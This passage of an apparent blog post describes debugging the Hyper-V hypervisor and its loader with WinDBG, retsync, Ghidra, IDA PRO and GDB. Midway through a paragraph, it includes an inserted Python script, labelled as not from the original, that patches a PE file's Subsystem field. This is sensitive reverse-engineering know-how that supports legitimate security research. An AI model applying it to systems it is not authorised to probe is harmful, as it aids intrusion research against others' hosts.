overflow: hidden; width: 214px;"><img height="113" src="https://lh6.googleusercontent.com/llnEL2LzXdB7PZ67XuN7leK0Dhj7AcogKzt_3PqYp8SLI4aTDY8WJxwfBQyYNI5rJipuwdh9PHNJRYMFt1TggPDoEkRAKErP4BSfOtlS8Z_CagYO-uJ-MRGi0kDLPrOGcTVgRUAVSly_JqE54w" style="margin-left: 0px; margin-top: 0px;" width="214" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Attach WinDBG to Hyper-V (for example, over the network) and load the retsync plugin (use straight quotes in the WinDBG command):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">.load @"C:\hv_debugging\sync.dll"</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; 
margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!sync</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 76px; overflow: hidden; width: 253px;"><img height="76" src="https://lh6.googleusercontent.com/q_tMr3_SAR7QVVZQWSoGslyZCShIlF3GVDiMlyyUqrRJRAqYGDCPXawTLZiZPzkcwDHixuFhlTZwMTmaBK3wge7XXh7MitbP14QSMbqXfyInlQ0QO7NJDe3in6GF1FNfN6bMxcst0wLqDkqjcQ" style="margin-left: 0px; margin-top: 0px;" width="253" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You get messages in the Ghidra console window:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 
1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 36px; overflow: hidden; width: 425px;"><img height="36" src="https://lh5.googleusercontent.com/7dW3hw58URQ8vxNCdmTRIAqFhby8Xgdx-EwLoaAZ_KttMtp4Y9K615PWTdyj9JjfH-0BlyUN_Wm-LTPMVfx_gmmrZFi1w28OBGxht9d9c9d7MBbJBtIMiNPu_Ll1WmUXIrP2PQDqq7EnnKWoUQ" style="margin-left: 0px; margin-top: 0px;" width="425" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In WinDBG you can see simple single-step output:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 167px; overflow: hidden; width: 373px;"><img height="167" src="https://lh5.googleusercontent.com/b_3YDJ61F_ugeA5DqmNvyL1W9uwm5zveGOehavVAjL1QHYmultH0udl5L2axLfG5KI_Qkd_zPwCL_Aa4ELQSSdfpGqPlJfKll2kdlAT13_8Gv4ZGG0TkV9urkx_dBxTnXJqdEse4uLNkHy8zxQ" style="margin-left: 0px; margin-top: 0px;" 
width="373" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I set a breakpoint on the HvPostMessage hypercall (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F2</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and pressed go (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F5</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">); the bp was triggered in WinDBG and was synced with Ghidra.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next I made some single steps (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: 
normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">F10</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 235px; overflow: hidden; width: 428px;"><img height="235" src="https://lh5.googleusercontent.com/QLpSAn4O5mdvJylb9VzXI-MrWRrPqJC0rxM9kCRYYONY0PoAgS2qG9JWXtfHFrghVzV8uUGUakmHXne7nE3rSBnHVhUUTf-tLlz8bTIkLugZ9YD1jSS5H3jZlyGkYcs3SgwCI0IlfjwUVi-UMA" style="margin-left: 0px; margin-top: 0px;" width="428" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> shortcuts (from plugin settings):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: 
justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 183px; overflow: hidden; width: 445px;"><img height="183" src="https://lh5.googleusercontent.com/cIWS0y_UJCFUm3ncGf99f0qqAOY1YN_nbUojYuwrqDD01kFKUwo_kTxfzJ1J7QzUQN6YvOJEoovNGY8RzL-VcmN4RWOudzk2XyqKO1nggKNiNyyJQkTOKt3ka8353Fn2BRb_-ADsw8lxhjH16A" style="margin-left: 0px; margin-top: 0px;" width="445" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">retsync</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> settings (from the official radare2 github.com page):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span 
style="border: none; display: inline-block; height: 240px; overflow: hidden; width: 366px;"><img height="240" src="https://lh4.googleusercontent.com/lR2kZNj4qezBgVkTpDPr8j-DlFOQV7gcExKuZb0lq9DOtvoBeNsLneyft5mEYflxdCYlbBbOAD06WBqeFaD-gfqQcuiZExO9zSVD_-Pq0uqsucHXXee53xGwtaRymOaAYES67kjIusM0fyv9tw" style="margin-left: 0px; margin-top: 0px;" width="366" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG sync plugin:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 208px; overflow: hidden; width: 366px;"><img height="208" src="https://lh4.googleusercontent.com/iRyMdRpVANoNIoRADFxQE6K4vSZTD38ROge-qLZcTlQQB0Mkv8yXma3hWQ7CVF-tNCQk0ZgtId0hDkid0X1GjEuoNUnS9vZvrm6J0QJZnt1oLwQjga1UCimDXtSKInyB7WJ9bCM6X-jqdwCzhw" style="margin-left: 0px; margin-top: 0px;" width="366" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can export symbols from IDA PRO using the FakePDB plugin and import them into the Ghidra database.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 414px; overflow: hidden; width: 383px;"><img height="414" src="https://lh5.googleusercontent.com/kHzYcgXP7Fgkdp8Ve1zPrbiVakGgDjy1nN36lQpt3xwb-o__2MIYeiy4t8KpjijDX3nK6OYdGBFfSdOkJ2CeNlllIRx5hZU7gxZJn5RociyixClxXGMus4WFc_LRf3jkdezadARnoAreyrorWg" style="margin-left: 0px; margin-top: 0px;" width="383" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interestingly, during analysis Ghidra could find 4100 functions inside hvix64.exe (build 10.0.17763.1577), while IDA PRO found 3687 functions (without manual definitions).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p 
dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the time of publication, Ghidra had a new “debugging” fork, but kernel mode debugging was not available. It is worth following the development of that fork: an embedded Ghidra debugger should be much more convenient.</span></p><h1 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 12pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypervisor loading</span></h1><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor loader component has changed 
during Hyper-V evolution:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvboot.sys - Windows Server 2008, 2008 R2;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvloader.exe or hvloader.efi - Windows Server 2012 R2, 2016;</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvloader.dll - Windows 10, Windows Server 2019.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinDBG debugging is comfortable enough, but at some stages of hypervisor loading the debugger is not accessible (functions like BlBdStop disable it), therefore we will follow hypervisor loading through 
GDB.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can also use this method when WinDBG is not available (e.g. when the OS is loaded with the Secure Boot option). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, we must prepare IDA PRO databases for GDB debugging. We have 3 files:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvix64.exe</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvix64.exe and hvloader.dll don’t have symbols.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">First, we connect WinDBG (we need to find the load offsets of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Second, we disable WinDBG, enable SecureBoot in the host OS and start debugging it.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For testing I used Windows Server 2019 (4 CPUs; the CPU count is not important during the boot process, but once you load the hypervisor and NT kernel you will be constantly switched between them – this is critical during single-step debugging). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We will debug </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> first. IDA PRO shows limited debugger options when the application type is Windows boot. 
Open your favorite PE editor, select “</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Optional header</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Subsystem</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">” and change “Windows boot application” to “Windows GUI”.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The research used hvloader.dll (10.0.10011.0) and hvix64.exe (10.0.10074.0). 
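The Subsystem change described above, done programmatically, as an added example that is not part of the original post: it rewrites the two-byte Subsystem field of IMAGE_OPTIONAL_HEADER on a copy of the file, and the PE header it runs on here is a constructed stand-in, not a real winload.efi.

```python
# Added example (not from the original post): flip a PE file's Subsystem
# from "Windows boot application" (16) to "Windows GUI" (2) on a copy, the
# same edit the post makes by hand in a PE editor so IDA PRO offers its full
# debugger list. The sample header built below is constructed, not real.
import struct

IMAGE_SUBSYSTEM_WINDOWS_GUI = 2
IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION = 16
# Subsystem sits at offset 68 of IMAGE_OPTIONAL_HEADER for both PE32 and
# PE32+ (BaseOfData+ImageBase in PE32 take the same 8 bytes as the PE32+
# ImageBase), so one offset serves winload.efi, hvloader.dll and hvix64.exe.
SUBSYSTEM_OFFSET_IN_OPTIONAL_HEADER = 68
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def optional_header_offset(data) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER; raises ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # 4-byte "PE\0\0" signature followed by a 20-byte IMAGE_FILE_HEADER.
    opt = e_lfanew + 24
    if opt + SUBSYSTEM_OFFSET_IN_OPTIONAL_HEADER + 2 > len(data):
        raise ValueError("truncated PE header")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    return opt


def read_subsystem(data) -> int:
    off = optional_header_offset(data) + SUBSYSTEM_OFFSET_IN_OPTIONAL_HEADER
    return struct.unpack_from("<H", data, off)[0]


def set_subsystem(data, new_subsystem=IMAGE_SUBSYSTEM_WINDOWS_GUI) -> bytes:
    """Return a copy of data with only the two-byte Subsystem field changed.
    The PE checksum is left as is; IDA does not verify it when loading."""
    buf = bytearray(data)
    off = optional_header_offset(buf) + SUBSYSTEM_OFFSET_IN_OPTIONAL_HEADER
    struct.pack_into("<H", buf, off, new_subsystem)
    return bytes(buf)


def patch_file(src_path, dst_path):
    """Patch a copy on disk; returns (old_subsystem, new_subsystem)."""
    with open(src_path, "rb") as f:
        data = f.read()
    patched = set_subsystem(data)
    with open(dst_path, "wb") as f:
        f.write(patched)
    return read_subsystem(data), read_subsystem(patched)


def build_sample_boot_app(pe32plus=True) -> bytes:
    """Construct a minimal PE header flagged as a boot application.
    Made-up test input (no sections, no code), not a real winload.efi."""
    e_lfanew = 0x80
    opt_size = 240 if pe32plus else 224   # sizes of PE32+ / PE32 optional headers
    hdr = bytearray(e_lfanew + 24 + opt_size)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", hdr, e_lfanew + 4, 0x8664 if pe32plus else 0x14C)
    struct.pack_into("<H", hdr, e_lfanew + 20, opt_size)   # SizeOfOptionalHeader
    opt = e_lfanew + 24
    struct.pack_into("<H", hdr, opt, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", hdr, opt + SUBSYSTEM_OFFSET_IN_OPTIONAL_HEADER,
                     IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION)
    return bytes(hdr)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        print("subsystem %d -> %d" % patch_file(sys.argv[1], sys.argv[2]))
    else:
        sample = build_sample_boot_app()
        print("sample before:", read_subsystem(sample))                  # 16
        print("sample after: ", read_subsystem(set_subsystem(sample)))  # 2
```

Run it as `script.py winload.efi winload_gui.efi` to produce the patched copy for IDA; the original file stays untouched.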
Before debugging, load winload.exe into IDA PRO, choose </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Select Debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">GDB</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; 